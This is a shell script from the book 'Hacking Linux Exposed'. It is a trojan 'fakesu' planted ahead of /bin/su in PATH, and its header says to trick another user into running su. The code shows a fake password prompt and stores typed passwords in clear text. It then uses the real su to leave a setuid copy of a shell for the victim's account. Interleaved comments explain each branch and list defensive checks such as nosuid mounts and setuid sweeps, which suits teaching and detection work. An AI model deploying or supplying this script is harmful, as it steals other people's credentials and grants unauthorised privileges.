Hacking Linux Exposed


#!/bin/sh
#
# fakesu
#
# Put this file in a directory early in your PATH
# and convince someone to run su from your account.
#
# Copyright 2002, Bri Hatch
#
# Released under the GPL.  See COPYING file
# for more information.
#
# What this listing demonstrates: a look-alike "su" that is resolved
# through PATH ahead of /bin/su.  On each run, for the user name given
# as $1, it takes one of three paths: record what is typed at a fake
# password prompt, call the real /bin/su with -c so that a setuid copy
# of a shell is left behind, or hand off to the real /bin/su.
#
# Defensive takeaways:
#   - The trick depends on "su" being looked up through the PATH of the
#     session it is typed in.  Calling /bin/su by absolute path avoids
#     that lookup, but the safer habit is not to enter privileged
#     credentials in a session that someone else controls.
#   - Mounting user-writable filesystems (home, tmp) with nosuid makes
#     the setuid bit set by the second branch ineffective.
#   - Sweep regularly for unexpected setuid files, for example with
#     find <mountpoint> -xdev -perm -4000, and review any that sit in
#     a home directory.
#   - The "incorrect password" lines below are printed by this script,
#     not by su.  Presumably the first branch leaves no failed-su entry
#     in the authentication log; verify against local logging.


# Directory that holds the collected data and the shell copies.
# PWLIST is a plain-text file of "name:password" lines inside it.
SHELLS=/home/cracker/shells/
PWLIST=$SHELLS/passwords

# Only the first argument is read; no su options are interpreted.
username=$1

# Snag password, store in $PWLIST
# Branch 1 runs when $PWLIST has no line beginning with "$username:".
# grep's output goes to /dev/null, so the backtick substitution expands
# to nothing and the if statement sees grep's exit status.
if ! `grep "^$username:" $PWLIST >/dev/null` ; then

	# Imitates su's prompt.  Both stty calls turn echo ON, so what is
	# typed here is displayed.  The real su does not echo a password, so
	# visible characters at a "Password:" prompt are a warning sign.
	echo -n "Password: "
	stty echo
	read password
	stty echo
	echo
	# Fake failure message, then the pair is appended in clear text.
	# A user who sees an unexpected su failure in someone else's
	# session should treat the typed password as exposed and change it.
	echo "/bin/su: incorrect password"
	echo "$username:$password" >> $PWLIST

# make suid shell by invoking actual su program with -c arg
# Branch 2 runs when a line for this user is already in $PWLIST and no
# file named $username exists; the test path is relative to the current
# working directory.  The stored password is not passed to su here: the
# real /bin/su does its own prompting.  If that authentication succeeds,
# the -c command runs as $username, copies $SHELLS/shell to
# $SHELLS/$username and sets mode 4755 (setuid bit plus rwxr-xr-x).
# The resulting setuid file in a home directory is the artifact to hunt
# for, and a nosuid mount neutralises it.
elif [ ! -e $username ] ; then

	/bin/su $username -c "cp $SHELLS/shell $SHELLS/$username;
		chmod 4755 $SHELLS/$username"
	# Printed whether or not the real su succeeded.
	echo "/bin/su: incorrect password"
else

	# We have the password and a suid shell already - run real su
	/bin/su $username

	# They've left su, let's kill ourselves so they can't
	# muck with our id.
	# kill without a signal option sends SIGTERM to the parent process
	# ($PPID) and to this script ($$).  The parent is presumably the
	# shell that su was typed in.
	kill $PPID $$
fi